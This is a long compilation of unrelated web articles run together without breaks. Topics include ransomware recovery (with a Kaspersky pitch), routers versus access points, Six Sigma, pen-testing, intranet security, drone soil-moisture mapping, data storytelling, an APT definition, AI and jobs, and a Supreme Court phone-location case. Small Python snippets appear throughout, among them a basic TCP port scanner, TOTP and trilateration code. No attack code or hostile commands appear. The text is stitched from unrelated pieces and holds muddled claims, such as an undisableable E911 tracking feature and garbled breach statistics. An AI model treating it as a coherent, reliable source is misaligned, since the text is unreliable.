If you experience a ransomware attack on your gaming PC, you don't have to pay large sums of money to a malicious actor using the ransomware. Instead, the best option is to restore your computer to factory settings. Restoring your computer to factory settings wipes it clean and makes it usable once again since it removes the files that the bad actors have encrypted. This is why regular backups are so important: restoring your computer to factory settings allows you to start using your device again and helps you avoid having to pay large sums of money. Backups will allow you to keep copies of your most crucial files somewhere that is not your device and to add them back to your computer once factory settings have been restored and you've ensured that the ransomware is no longer affecting your device.
Once you have removed ransomware from your device, make sure you take the additional steps necessary to ensure your device is secured in the future. You will want to add a comprehensive antivirus and security solution to your PC, and if you want to keep yourself safe from ransomware again, make sure that the solution has a dedicated anti-ransomware tool on it. Taking steps to avoid ransomware before you get it, including browsing the web more carefully and using trusted antivirus protection software, can help you avoid the headache of getting ransomware in the first place, or let you know if you've accessed a file that may contain ransomware, so you mitigate the damage done before it even begins.
Keep your gaming PC safe from ransomware with Kaspersky Security Solutions
Gaming online can be an engaging and fun pastime—but you may also worry about the security of your devices, especially with ransomware attacks on the rise. So, if you've been thinking: is my computer safe from ransomware? You may want to consider using one of Kaspersky’s Security Solutions to ensure your devices and software are safe.
When you use a gaming PC to play games online, you want to make sure it has security solutions installed on it so that you can game stress-free. By installing antivirus and other security software, you can ensure the computer you're using, the data that's on it, and other devices connected to the same network (and their data) are safe. The most effective, reliable, and comprehensive security solutions available are the options from Kaspersky.
Kaspersky has created a wide selection of antivirus and PC protection programs that can keep your device safe, even while you connect to the web to the game. You can run Kaspersky programs in gaming mode so that your security solutions don't create lag, interrupt play, or have any effect on your gaming experience. Gaming should be an opportunity to relax, have fun, and compete with peers and friends—and you should be able to do just that without having to worry about ransomware unexpectedly impacting your experience and rendering your equipment unusable.
Wireless networks are standard in just about every home or corporate building. Because Wi-Fi access is so ubiquitous with the Internet experience, just about everyone knows what a router is because they have them in their homes. Wireless access points, however, are a term not everyone is familiar with and it’s important to understand the difference between the two. In some instances, you may need wireless access points to satisfy your networking needs, or a router, or both, so let’s take a look at what the differences are.
What Are Routers?
Just about anyone who has used Wi-Fi has interacted with a router, whether they realized it or not. Essentially, they’re used to route packets between multiple networks. Consumer routers usually have two network interfaces: LAN and WAN. LAN (local area network) connects to the WAN (wide area network) and essentially distributes the service you’re receiving. Routers are fantastic for homes or small businesses, where you need to give Wi-Fi signal to a number of computers and devices simultaneously.
What Are Wireless Access Points?
Wireless access points provide devices with connectivity to a router, which is then able to access a local network or the Internet. This is a practical solution in instances where connection via physical cables may be difficult or impractical. Think of it this way: letters aren't delivered directly from a postman to the addressee—instead, the parcel is delivered to a postal service, which then routes it to the appropriate portion of the postal system that is capable of delivery. Wireless access points are often used to extend Wi-Fi range within larger buildings that can't otherwise feasibly have their network in all of those hard-to-reach areas where power may be unavailable or the construction of the building may cause difficulties. Access points can also be powered over their Ethernet cables (Power over Ethernet), allowing for installation in remote spots where running separate electrical wiring would be difficult.
Which is Right For You?
Either way, you’re going to be connecting to a router—it’s just a question or whether you’re doing it physically, with a cable, or wirelessly, with an access point. This is all situational, but wireless access systems are typically deployed in widespread facilities, when several buildings need access, college campuses where you have disparate users who may need Internet access outside or in cafeterias, or even just offices where wireless connectivity makes it easy for guests to get online during meetings.
Get in Touch with FiberPlus
FiberPlus has been providing data communication solutions for over 25 years in the Mid Atlantic Region for a number of different markets. What began as a cable installation company for Local Area Networks has grown into a leading provider of innovative technology solutions improving the way our customers communicate and keeping them secure. Our solutions now include:
- Structured Cabling (Fiberoptic, Copper and Coax for inside and outside plant networks)
- Electronic Security Systems (Access Control & CCTV Solutions)
- Wireless Access Point installations
- Public Safety DAS – Emergency Call Stations
- Audio/Video Services (Intercoms and Display Monitors)
- Support Services
- Specialty Systems
- Design/Build Services
FiberPlus promises the communities in which we serve that we will continue to expand and evolve as new technology is introduced within the telecommunications industry.
Have any questions? Interested in one of our services? Call FiberPlus today 800-394-3301, email us at [email protected], or visit our contact page. Our offices are located in the Washington, DC metro area, Richmond, VA, and Columbus, OH. In Pennsylvania, please call Pennsylvania Networks, Inc. at 814-259-3999.
The Continuous Improvement Model is a tactical method that’s implemented across a company to provide a roadmap for improving its practices.
Different models exist such as Lean and Six Sigma and can vary in terms of structure, but the goal is to purge your enterprise of excess and improve the quality and efficiency of work processes.
Six Sigma is the more popular and widely recognized of these models. It is a Continuous Improvement Model that centers on enhancing consistency and eliminating variability.
Six Sigma seeks to attain stable and predictable process results. This is achieved by having a clear roadmap and procedures in place that can be measured to attain improvement for a company’s future.
As a meticulous and data-driven approach, Six Sigma focuses on quality over quantity by being ensconced in statistical analysis.
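To make the statistical flavor of Six Sigma concrete, here is a minimal sketch (not part of any official Six Sigma toolkit) of two of its standard yardsticks: defects per million opportunities (DPMO) and the corresponding sigma level, computed with the conventional 1.5-sigma shift:

```python
from statistics import NormalDist

def dpmo(defects, units, opportunities_per_unit):
    """Defects per million opportunities."""
    return defects / (units * opportunities_per_unit) * 1_000_000

def sigma_level(dpmo_value):
    """Short-term sigma level, using the conventional 1.5-sigma shift."""
    return NormalDist().inv_cdf(1 - dpmo_value / 1_000_000) + 1.5

# e.g. 7 defects found across 1,000 units with 4 defect opportunities each
rate = dpmo(7, 1000, 4)          # 1750 DPMO
print(round(sigma_level(rate), 2))
```

A process at the famous "six sigma" quality level corresponds to about 3.4 DPMO under this convention.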
To succeed, Six Sigma depends on a strong group of individuals who bring specific expertise to see the Continuous Improvement Model through. These experts come prepared and have extensive credentials and certifications to help with the process.
Kaizen originates from the Japanese word meaning “change for the better.” Kaizen is another form of the Continuous Improvement Model that works to better the process of ebbs and flows within an organization.
The difference between Six Sigma and Kaizen is that Six Sigma is more organized, and Kaizen is less rigid.
At the heart of Kaizen is a conviction and mentality that allows organizations to eradicate waste, improve work quality, and inspire employees to bring their A-game in the improvement of their daily work.
Also, Six Sigma has clearly defined roles, whereas Kaizen has no defined chain of command in the Continuous Improvement Model.
Kaizen itself takes two forms. Flow Kaizen is geared towards the process and flow of information and materials, while Process Kaizen is the improvement of individual and team processes. Both use disciplined research whereby changes can be adjusted along the way.
Companies using the Continuous Improvement Model can adapt as they work in the marketplace via experimenting. The result is Flow and Process Kaizen allow for improvements to continue and to be monitored.
Theory of constraints
This theory identifies the constraint that slows down the overall process and works to improve the system around it: you relieve one constraint, then identify the next one.
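The core idea can be sketched in a few lines: the system's throughput is capped by its slowest stage, so you find that stage, improve it, and repeat. The stage names and rates below are made up for illustration.

```python
def bottleneck(stages):
    """Return (name, rate) of the slowest stage -- the system's constraint."""
    name = min(stages, key=stages.get)
    return name, stages[name]

# hypothetical production line, rates in units per hour
stages = {"cutting": 120.0, "assembly": 45.0, "packing": 90.0}
name, rate = bottleneck(stages)
print(name, rate)  # the whole line can ship at most what this stage produces
```

After improving the constraint (say, assembly reaches 100 units/hour), rerunning the same check reveals the next constraint, which is the iterative loop the theory describes.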
Total quality management (TQM)
TQM focuses on employee engagement, organized thinking, and other concepts to improve business from the ground up.
Continuous Improvement Model: examples
The Continuous Improvement Model doesn’t stop working once you have achieved your goals. As the term states, it aims for constant modifications, so the result is always being perfected.
1. Think tanks and ideation
A think tank's goal is to foster innovative dialogue with employees, which can occur in different ways. By drawing out different perspectives — no idea is a bad one — a seed can be planted to grow new ideas. By implementing these strategies, companies gain better insights into future possibilities.
2. Training for employees
Training is an important part of any company’s strategic goals to align people with the latest technology and ideas.
Cross-training employees in different areas keeps the Continuous Improvement Model working. A good example is when someone is out sick: because colleagues know aspects of each other's jobs, someone can fill in while they are away.
3. Surveys and Polls
With so many platforms in use today, surveys and polls have become an important way for a company to keep track of the improvements it needs to make. Every idea matters, and surveys and polls help drive this point home.
As an ongoing process model, a sound strategy is in place to improve your business. The end game is to optimize the outcome for the best results to leverage for your enterprise.
Learn how to start an organizational culture that drives results.
Raising security awareness nowadays is more important than ever considering the fact that anyone who has a device connected to the internet can fall victim to malicious attacks. While it may bring certain inconveniences for individuals, business owners can lose everything when a successful security breach takes place; a damaged reputation and relationship with customers can ruin a business.
Investing in a good security specialist as well as organizing cybersecurity training courses or other educational programs for your staff is crucial as these measures increase the protection of sensitive information and the integrity of internal resources.
However, you don’t need to wait until someone tries to compromise your security to assess your protection. Instead, you can do it yourself now.
Most often, penetration testing (pen-testing for short) is used for these purposes. The core of pen-testing lies in discovering security issues and vulnerabilities of a network, website, or application by breaching it. In a nutshell, it's a real hacking attack with the only differences from a malicious one being that you are the initiator of the attack, you receive a report with the results, and you pay to get hacked. Various ways of launching these attacks exist depending on the aim of the testing.
The most commonly used cases are blind testing when a company that performs pen-testing is not given any information apart from your website name, and double-blind testing when in addition to that your security specialists have no idea that the attack is planned. Also, the tests can be external (when only publicly available resources are targeted) and internal (simulating the attack made by an employee or having the employee’s credentials to corporate resources).
Why may you ever need this?
Here are 3 solid reasons why hacking your own network is not such a crazy idea as it may seem from the first sight.
Reason 1: To discover and oust vulnerabilities in the system
Regardless of the software you use, certain vulnerabilities still exist. According to recent security reports, almost half of web applications have serious security issues, while medium- and low-risk issues were found in more than 80% of applications.
In the course of pen-testing, ethical hackers simulate the most common practices used to gain access to your system, upload malware to it, or steal information. They use XSS attacks, SQL injections, various PHP exploits, and other common vulnerabilities to plant malware and ransomware on working machines. It's also possible to simulate a DDoS attack to see whether your network can sustain it.
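Reconnaissance for a test like this often starts with something as basic as a TCP port scan to see which services a host exposes. A minimal sketch in Python (illustrative only; run it solely against hosts you are authorized to test):

```python
import socket

def scan_ports(host, ports, timeout=0.3):
    """Return the ports in `ports` that accept a TCP connection on `host`."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connection succeeded
                open_ports.append(port)
    return open_ports

# example: look for services on a small slice of localhost ports
print(scan_ports("127.0.0.1", range(8000, 8010)))
```

Real pen-testing tools add service fingerprinting, timing evasion, and vulnerability checks on top of this basic probe, but the principle is the same.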
As a result of pen-testing aimed at discovering the weak system points, you will be able also to pick up additional security solutions you may want to implement in your organization.
Reason 2: To develop security policies within your company
Unfortunately, security policies within a company are most often created only after a security incident.
In the case of a successful hacking event that you initiated yourself, you will come away understanding the imperfections and backdoors in your procedures, and can respond by, for example, restricting access to sensitive data, enforcing automatic regular password changes, adding additional authentication such as 2FA or OTP, and logging your employees' activity inside the corporate network.
Also, it can involve updating security tokens within the system within shorter intervals, conducting a regular access audit, and implementing immediate account deactivation once an employee leaves the company.
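One of the measures mentioned above, one-time passwords, is straightforward to illustrate. The sketch below follows the TOTP scheme (RFC 6238, HMAC-SHA1) and is for illustration only, not a production implementation:

```python
import hashlib, hmac, struct, time

def totp(secret, timestamp=None, digits=6, step=30):
    """Time-based one-time password (RFC 6238, HMAC-SHA1)."""
    counter = int(time.time() if timestamp is None else timestamp) // step
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F  # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test vector: shared secret "12345678901234567890", T = 59 seconds
print(totp(b"12345678901234567890", timestamp=59, digits=8))  # prints 94287082
```

Because the code depends on the current 30-second window, an attacker who steals a password alone cannot log in without also compromising the device that holds the shared secret.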
These routine measures matter because they can save sensitive data from leakage. According to recent statistics, the number of records exposed by data breaches at the beginning of 2020 was over eight billion, four times more than at the beginning of any other year.
Reason 3: Check if your company is an easy target for social engineers
(Image by Varonis, © 2020 Inside Out Security)
Unfortunately, there is no ultimate protection for the social engineering attacks since humans are not machines and they cannot block the incoming threats by default. This makes people the easiest target for hacking. Modern social engineers are great manipulators and can use people’s emotions and feelings such as compassion, fear, or desire to help to gain the necessary info.
They can pretend to be a boss requiring a banking account or a customer who forgot their password, or even non-tech savvy people asking you to help them open a tutorial which masks an attempt to force you to download some malware. Even the big technology companies are suffering from these kinds of cyberattacks.
To avoid this, it's recommended to raise employees' security awareness, implement verification procedures for customers, set up a strict policy on internal information sharing, and make sure that employees report all suspicious situations. In addition, regular checks involving social engineering can help estimate the current threats and reveal the learning gaps of your employees.
Based on this information, one can see the benefit of conducting different tests and simulating external attacks (pen-testing) to check the security potential of a business, what information is the least protected and vulnerable to leakages, what flaws exist in the current procedure, and the readiness of your systems and people to counteract security threats.
The results obtained after the application of one strategy or multiple strategies will provide you with the current protection level and the chances of suffering from a given type of real attacks. They also provide the direction your company should take to improve the security, what backdoors need to be closed, and other measures to strengthen the security of your business.
If it is one of those rare cases that the test passed successfully and the security audits did not discover any potential threats, it does not mean that you made your system secure once and for good. Security is like health that requires constant monitoring and regular checkup to make sure everything is working smoothly and avoid unexpected emergencies.
Stewart Dunlop looks after content marketing at Udemy and has a passion for writing articles that users will want to read. In his free time, he likes to play football and read Stephen King.
Maintaining a secure and efficient intranet is essential in today’s digital age. The two go hand in hand. As more businesses become globalised and better connected to the outside world, the danger of cyber crime becomes more prevalent. Companies are combating this by instituting a strong security system within their internal networks. Intranets are used to ensure that internal and external business activities run smoothly. However, these networks also help to protect valuable customer information that outside sources can access. The risk of illegal activity occurring within an intranet is real. Therefore, companies need to implement the necessary security measures to prevent it from happening.
What is Intranet Security?
Intranets are computer networks used exclusively by a single organisation or corporation, such as a business, school, or hospital. Like the Internet, they act as a virtual shared space for exchanging information; unlike the Internet, they are private and carry extra security measures. Extranets work similarly but extend access to outside partners. Intranets are used by employees, and sometimes suppliers, to access information or collaborate internally in a secure way.
Intranet security protects information, equipment, and physical property within the intranet. Security measures are implemented for all intranets; however, depending on the type of business or industry, these security measures may differ. These security measures can vary from site to site and department to department, depending on the size of the network.
The Importance Of Intranet Security
Enhanced Communication, Information Exchange, and Teamwork
The success of the intranet hinges on how effectively it is secured. Intranets are valuable business tools and abusing them can harm a company. Security is paramount for any organisation or corporation that utilises an intranet as a service component or digital platform.
Increase in Employee Productivity
Because an intranet allows its users to access various applications and files, it serves as a venue for increased employee productivity. Employees within an organisation can access information and review documents without having to be physically present in the office or send information through email. It creates a virtual command centre where employees can collaborate effectively and efficiently.
Intranets employ various security measures to prevent illegal activity, block unauthorised access, and protect valuable information. One example is encrypting data in transit, an effective way to prevent eavesdropping and hacking. Another is running networked applications in secure virtual sandboxes, which denies hackers and malicious websites direct access to an intranet's servers.
It is Cost-Effective
Intranets are cost-effective for business because they allow companies to share valuable information and applications. It gives employees greater access to the information they need and makes it easier for company managers to communicate internally with staff. It also allows them to decide how best to utilise such information. It is a more streamlined way of working and can reduce waste.
How to Secure an Intranet
It is important to secure your intranet. Once you have implemented your security system, you need to ensure that it works effectively and efficiently, or it can become a hindrance.
The following are some steps you can take to secure your intranet:
1. Establish a Comprehensive Security Policy
Effective security requires that you establish a comprehensive security policy. This policy should be specific and contain all the relevant details regarding your company’s information, applications, equipment, and physical security measures. It should also include policies for different departments within your corporation and website users.
2. Modern User Experience
A secure intranet should also be user-friendly and personalised to the needs of your employees. For instance, it should ensure that employees can access applications and files independently when necessary. It should also provide end-to-end encryption for sensitive information.
3. Strengthen Your Log-in Protocols
Hackers always look for ways to access your intranet, and a strong log-in protocol is a key component of an effective security system. Attackers will try to get into your system using various methods, such as cracking passwords or exploiting security vulnerabilities in the browser. You need to strengthen these points by requiring longer, more complex passwords and multiple authentication factors whenever possible.
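As an illustration of the password half of that advice, a minimal policy check might look like the sketch below. The specific rules (12-character minimum, mixed character classes) are assumptions for the example, not a mandated standard:

```python
import re

def password_issues(pw, min_length=12):
    """Return a list of policy violations; an empty list means the password passes."""
    checks = [
        (len(pw) >= min_length, "shorter than %d characters" % min_length),
        (re.search(r"[a-z]", pw), "no lowercase letter"),
        (re.search(r"[A-Z]", pw), "no uppercase letter"),
        (re.search(r"\d", pw), "no digit"),
        (re.search(r"[^A-Za-z0-9]", pw), "no symbol"),
    ]
    return [msg for ok, msg in checks if not ok]

print(password_issues("hunter2"))        # several violations
print(password_issues("Tr0ub4dor&Xyz"))  # []
```

A check like this belongs at account creation and password change, alongside (not instead of) multi-factor authentication.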
4. Meet Global Security Standards
You must comply with global data security standards. This ensures that your information is protected, and you meet important compliance requirements. It also demonstrates to customers, clients, and vendors that you respect their personal information and guarantees security.
5. Secure Third-party Integrations
If you use third-party applications, you need to make sure that these applications are safe and compatible with your security process. If you have chosen to use a third-party application, ensure it is antivirus-protected and constantly updated.
Intranets are a valuable asset for businesses to have. However, the success of an intranet relies on how effectively it is secured. Intranets provide employees with easy access to information and collaboration. This allows employees to be more effective in their jobs, and employers can communicate more efficiently with the staff.
As the intranet's value increases, so does the importance of securing it. Once the intranet is fully secured and protected, it becomes an even greater asset and increases productivity in both business and personal lives.
An effective intranet security system is imperative for an organisation that utilises a digital platform or service component. It ensures that employees and customers have safe access to your organisation’s valuable information. It also protects your business’s data and assets as well as the reputation of your company in the marketplace.
Monash University researchers have equipped a drone with microwave sensing technology to map the soil moisture of farmland.
Late last year, the team completed field experiments using optical mapping which can determine soil moisture levels in the near-surface of crop fields.
Research is now being conducted using drones fitted with passive L-Band microwave emission sensors, with flights planned that will measure P-Band waves. P-Band waves are expected to be able to measure up to 15cm into the soil unimpeded by vegetation and tillage features.
In the trials, after the drone has covered the field, data is taken from it to produce a map of ground soil moisture levels to inform the farmer on how best to irrigate an area.
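The mapping step, turning scattered point readings into a field-wide moisture map, can be illustrated with inverse-distance weighting. This is a generic interpolation sketch, not necessarily the method the Monash team uses, and the coordinates and readings below are invented:

```python
def idw(samples, x, y, power=2.0):
    """Inverse-distance-weighted estimate at (x, y) from (xi, yi, value) samples."""
    num = den = 0.0
    for xi, yi, value in samples:
        d2 = (x - xi) ** 2 + (y - yi) ** 2
        if d2 == 0:
            return value              # query point coincides with a sensor reading
        w = 1.0 / d2 ** (power / 2)
        num += w * value
        den += w
    return num / den

# invented sensor readings: (metres east, metres north, volumetric moisture %)
readings = [(0, 0, 22.0), (100, 0, 30.0), (0, 100, 26.0)]
moisture_map = [[idw(readings, x, y) for x in range(0, 101, 50)]
                for y in range(0, 101, 50)]
```

A grid like `moisture_map` is what an irrigation controller could consume to vary water application across the paddock.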
“We need to produce 60 per cent more food with the same amount of land and water, and we can only achieve this by being more efficient with the water we use through irrigation,” said team leader, Professor Jeff Walker, head of civil engineering at Monash.
A Monash drone being prepared for lift-off
“We need to know how much the crop needs, how much moisture is already there and apply just the right amounts of water in the correct places to avoid wastage while keeping the crop at its peak growth,” he added.
Testing has taken place at two farms, in regional Victoria and Tasmania. One was a dairy farm using a centre pivot irrigator and the other a crop farm using a linear shift irrigator.
The aim is to fully optimise the use of water on farms, a shortage of which can have enormous human and financial consequences. Agriculture uses 50 to 70 per cent of the water consumed in Australia each year.
The Bureau of Meteorology and CSIRO, in a December State of the Climate report forecast a decrease in rainfall across southern Australia with more time in drought, with an increase in intense heavy rainfall throughout Australia.
The agencies predict further increases in sea and air temperatures, with more hot days and marine heatwaves, and fewer cool extremes – all of which put greater pressure on water availability.
“If the soil is too dry, crops can fail due to a lack of water. But if the soil is too wet, crops can not only fail but pests and diseases can flourish,” Walker said.
“At best, farmers might have a single soil moisture sensor in a paddock, but this doesn’t allow for the optimal application of water, especially as this resource becomes scarcer. Plus it won’t take into account moisture variation levels across the individual paddocks,” he said.
The researchers say the technique could allow farmers to be more precise in their use of water, improve irrigation practices and maximise crop harvest.
“Farmers also need to cooperate; water conservation and efficiency is a collective responsibility. Everyone needs to do their part to use water more effectively or we’re at risk of running out completely,” Walker said.
“As the world’s driest continent facing climate change, a growing population and a greater demand for food, water conservation should be one of Australia’s top priorities,” he added.
The global market for drones in agriculture is estimated to reach US $2.9 billion by 2021, according to Zion Market Research.
Their uses are wide-ranging. Equipped with hyperspectral sensors, they can measure water and nitrogen levels far more efficiently than labour-intensive ground surveys. They can also be used to dust crops, survey fences, and muster livestock instead of using expensive helicopters.
Be it in the form of fables that teach good morals or mythological tales that underpin the major world religions, stories have been a proven medium for teaching, explaining, and influencing. Combining these benefits of stories with the factuality of quantitative data to drive decision-making is what data-driven storytelling is all about.
The effectiveness of stories in getting a point across stems from a psychological phenomenon called neural coupling. It is an event where, while listening to a story, the neural activation patterns of the listeners mirror those of the storytellers.
What this implies is that the listener becomes more receptive, trusting, and empathetic to the storyteller since both their brains are synchronized. And when infused with facts and data, stories or narratives can be a highly potent tool to bring about organizational change and shape business outcomes.
So, what is data storytelling?
Put simply, data storytelling is a communication technique that involves weaving stories or narratives around data to ensure that the insights from it are well received, retained, and acted upon. It involves the following three components:
Data
Data storytelling requires you to have up-to-date and accurate data. Data reporting platforms automatically pull vast amounts of data from multiple sources and save a lot of time in data collection and cleaning. Once the collected data is cleaned, it is processed and analyzed using algorithms to derive statistics and actionable insights.
Visualizations
The goal of visualizations is to uncover trends and convey them in a comprehensible way. The insights extracted from data are graphically represented using charts, graphs and other visual elements to convey the information. These visualizations help in discovering underlying trends and patterns in complex datasets that may have otherwise been missed while using a spreadsheet. The trends and insights are then communicated in an easy-to-decipher manner to help businesses to come to conclusions quickly.
Narrative
The final and most important element of data storytelling is narrative. Using a narrative to support the visualization and insights can help in presenting them in a simple language. Business users and analysts can use these narratives to highlight significant trends, changes, KPIs and metrics, and accelerate their decision-making process.
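In its simplest form, the narrative layer is just template sentences driven by computed statistics. A toy sketch (the metric, wording, and sample figures are invented for illustration):

```python
def sales_story(months, sales):
    """Turn a monthly sales series into a one-sentence narrative."""
    best = max(range(len(sales)), key=sales.__getitem__)
    change = (sales[-1] - sales[0]) / sales[0] * 100
    direction = "grew" if change >= 0 else "declined"
    return (f"Sales {direction} {abs(change):.1f}% over the period, "
            f"peaking in {months[best]} at {sales[best]:,.0f}.")

print(sales_story(["Jan", "Feb", "Mar"], [1000.0, 1500.0, 1200.0]))
# -> Sales grew 20.0% over the period, peaking in Feb at 1,500.
```

Commercial natural language generation platforms layer richer templates, tone control, and insight ranking on top of this basic pattern.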
Why should businesses adopt data storytelling?
Today, businesses across industries are collecting more data than ever from various sources like social media, research firms, and their own processes in the form of analytics reports and logs. All this data can be used to analyze existing trends and make informed decisions.
However, most businesses are unable to make the most of their data. That’s because business leaders who are not data-savvy may have a hard time making sense of this data even after it is cleaned, sorted, and visualized by data analysts.
They are unable to interpret the data by considering the context, and thus cannot gain any actionable insights for decision-making. Hence, even if an organization’s data scientists perform incredibly astute data analyses, they cannot drive organizational change.
By adopting data storytelling and the power of language, business leaders are able to understand where their organization has been, where it is, and where it is heading in the form of fluid, easy-to-understand narratives. By reading or listening to data-driven stories, business leaders can easily grasp the most remarkable highlights from their data and can also gain clarity in terms of future steps to be taken.
And since stories have greater influential power than just data alone, data-driven storytelling can actually transform the way an organization functions and lead to improved business outcomes. It adds purpose and meaning to insights and makes it easy for businesses to process complex business information. Marrying data analytics with storytelling makes visualizations more engaging and impactful, helps in keeping the audience engaged, and leaves a lasting impact on them.
How can businesses facilitate data-driven storytelling?
In order to implement and benefit from data storytelling, businesses can do either of the following two things:
- They can invest in training their data analysts to be good storytellers. It may take some time, but eventually, they can have analysts capable of providing insights through easy-to-consume narratives. Or,
- Businesses can use natural language generation technology to automate report writing and turn their analytics reports into stories written in an engaging tone. These stories can build a convincing and impactful narrative around analytics data to tell business leaders what's happening in their organization, making the analysts’ job easier.
Get AI-generated Data Stories with Phrazor
Phrazor uses augmented analytics and natural language generation to create unique AI-generated e-commerce stories from data. It takes in the data, analyzes it to draw insights and presents them in the form of engaging stories with the help of narratives, all without human intervention. With Phrazor’s data stories, business users can make data-driven decisions at the speed of thought. All you need to do is upload your dataset and set the required parameters, and you can have multiple automated data stories compiled in a report, in just a few clicks.
Here’s what a data story generated by Phrazor looks like:
This is a monthly sales and customer analysis report for e-commerce companies that uses relevant analytics and visual dashboards written in natural language summaries to provide data-driven insights. Using this report, executives or sales and marketing managers of large organizations and SMEs can get insights from monthly e-commerce retail sales and customer analysis.
Businesses across the globe have adopted data storytelling to improve business reporting and decision-making processes. Regardless of the means used by businesses to implement it, data-driven storytelling can undoubtedly help them make the most of their data. By combining the objectivity of data with the fascination of stories, Phrazor creates compelling data stories from complex datasets in real-time and helps businesses in accelerating their journey towards becoming more data-driven, and hence more efficient and effective.
To try Phrazor for your business, get in touch with us.
Advanced Persistent Threat
Advanced Persistent Threat (APT) is a general term used to describe tenacious, hidden, sophisticated cybersecurity threats against high-value targets.
APTs utilize different attack methods and systems that try to exploit known or zero-day vulnerabilities. Activities include the use of malware, network intrusion, and social engineering in a multi-layered approach. The motive behind these assaults is generally to install malicious software on one or more devices and have it remain undetected for a long period in order to surveil the target system.
APT attacks are often used for state-sponsored corporate espionage or espionage against another government. Motives also include the theft of intellectual property (IP) or the aggregation of sensitive information on high-level persons inside the target organization. The extraction of such information may be followed by extortion or other attempts to use it to compromise personnel. APTs can also be used more directly to harm and disrupt the target's communications and operations.
APT costs in terms of expertise, manpower, computing power, and hardware resources are considerable and therefore the perpetrators are likely to be rogue governments seeking a new theater of conflict.
"The conviction of the apprehended foreign hackers responsible for last year's attack proves our suspicion that their country of origin is a hotbed of Advanced Persistent Threats, maybe even government-sponsored ones."
I’ve been thinking a lot recently about the many ways in which artificial intelligence may change our lives.
copyright by www.forbes.com
One of the biggest impacts may be on jobs, not only on the nature of work itself, but on the availability of work. Some crystal ball gazers are predicting that AI (working in concert with its older sibling, automation) will trigger massive job losses; others see AI producing a net gain in employment. Both views can be supported both logically and empirically; but they both can’t be right.
As Andy Kessler put it in a June 17 Wall Street Journal column, “The future happens, just not the way most people think.” Kessler then walked readers through a shopping list of past predictions that turned out to be way off the mark: “megamistakes,” he called them. One group of AI prognosticators is heading in that direction; we just don’t know which one.
So what do we know about AI? We know that AI algorithms—which are intended to trigger various responses by workers or machines—are created by humans, and are therefore subject to human error, bias, and a host of other potential flaws the techies would rather not talk about. AI is no more infallible than you or I.
Predictions about AI are therefore equally suspect. We don’t know what we don’t know.
What we do know, however, with some degree of certainty, is that AI’s smart technologies likely will impact the labor market, as all new labor-substitution technologies do, affecting some occupations more than others. The Brookings Institution suggests that the occupations most at risk include those involved in food preparation and food service, production operations, office and administrative support, farming, fishing and forestry, transportation and material moving, and construction and mining.
Frontier Economics, in a September 2018 analysis prepared for the Royal Society and British Academy, points more generically to “jobs typically performed by workers with relatively low levels of formal education” as most at risk.
A BCG team led by Andrea Gallego, Matt Krentz, Miki Tsusaka and Frances Brooks Taplett, in another recent report, “How AI Could Help—or Hinder—Women in the Workforce”, suggests the occupations most at risk are those stereotypically held by women: bank tellers, clerical and administrative positions, teachers. Brookings, on the other hand, suggests that jobs typically performed by men, truck driving and working on factory assembly lines, for example, are slightly more at risk.
Don’t let the jumble of conflicting analyses and opinions confuse you. The important point—whether you’re looking at the BCG report, the Brookings study, or the Royal Society/British Academy analysis—is that millions of today’s jobs, thanks to AI and other technologies, won’t exist in the future, or won’t exist as we know them today.[…]
Right to Privacy Can Police Obtain Smartphone Location Data Without a Warrant?
Today the Supreme Court Justices heard arguments in a major right-to-privacy court case, Carpenter vs. USA. The case challenges an interpretation of the law that allows crime investigators to obtain a suspect's smartphone location data, including a location history, from wireless service providers without a warrant. Attorneys for Carpenter argue that the lack of a search warrant is a violation of the Fourth Amendment.
Timothy Carpenter was arrested in 2011 and convicted of a series of armed robberies of electronics stores in Ohio and the Detroit, Michigan area. Prosecutors used cell site location data from Carpenter's cell phone providers as part of their evidence. The location data, obtained with court orders rather than search warrants, showed the defendant was near the crime scenes.
Mr. Carpenter's American Civil Liberties Union lawyers maintain that this violated Carpenter's right to privacy and constituted an unreasonable search and seizure under the Fourth Amendment.
How does mobile phone tracking work?
It is possible to track the position of a mobile phone or other cellular-connected electronic device by its position relative to nearby antennas. Networks based on the Global System for Mobile Communications (GSM) use a device's signal strength at nearby cell towers, via an always-on location capability tied to the E911 emergency requirement that cannot be disabled, to triangulate the device's location. Cellular phone service providers like Verizon and AT&T and internet companies like Google can track a device's location at all times.
In addition, the metadata stored with a smartphone's photos can reveal where a phone was and when, although this court case does not involve the images that were on the device itself.
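Tower-based triangulation can be sketched with a toy example. Assuming three towers at known coordinates and distances inferred from signal strength (the coordinates and numbers below are purely illustrative, not from the case record), the position falls out of a small linear system:

```python
import math

def trilaterate(towers, distances):
    """Estimate a 2-D position from distances to three cell towers.

    Subtracting the circle equation of the first tower from the other
    two yields a 2x2 linear system, solved here with Cramer's rule.
    """
    (x1, y1), (x2, y2), (x3, y3) = towers
    r1, r2, r3 = distances
    # Linearized system: A * [x, y]^T = b
    a11, a12 = 2 * (x2 - x1), 2 * (y2 - y1)
    a21, a22 = 2 * (x3 - x1), 2 * (y3 - y1)
    b1 = r1**2 - r2**2 + x2**2 - x1**2 + y2**2 - y1**2
    b2 = r1**2 - r3**2 + x3**2 - x1**2 + y3**2 - y1**2
    det = a11 * a22 - a12 * a21
    x = (b1 * a22 - b2 * a12) / det
    y = (a11 * b2 - a21 * b1) / det
    return x, y

# Hypothetical towers at known coordinates (km); distances inferred from signal
towers = [(0.0, 0.0), (4.0, 0.0), (0.0, 3.0)]
phone = (1.0, 1.0)
dists = [math.dist(phone, t) for t in towers]
print(trilaterate(towers, dists))  # ≈ (1.0, 1.0)
```

Real carrier data is noisier than this, so providers typically report a sector and an approximate range rather than an exact point, but the principle is the same.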
The standard for accessing location data from electronic devices stems from the 1986 Stored Communications Act. This was last amended in 1994. Technology and the accuracy of location pinpointing have both evolved since then. The U.S. Constitution’s Fourth Amendment was, obviously, drafted in the 18th century. Requesting cell phone location data records does not require a warrant. However, it does require a court order. A court order is much easier to obtain than a search warrant.
A Supreme Court ruling on this digital right to privacy issue is expected in June 2018.
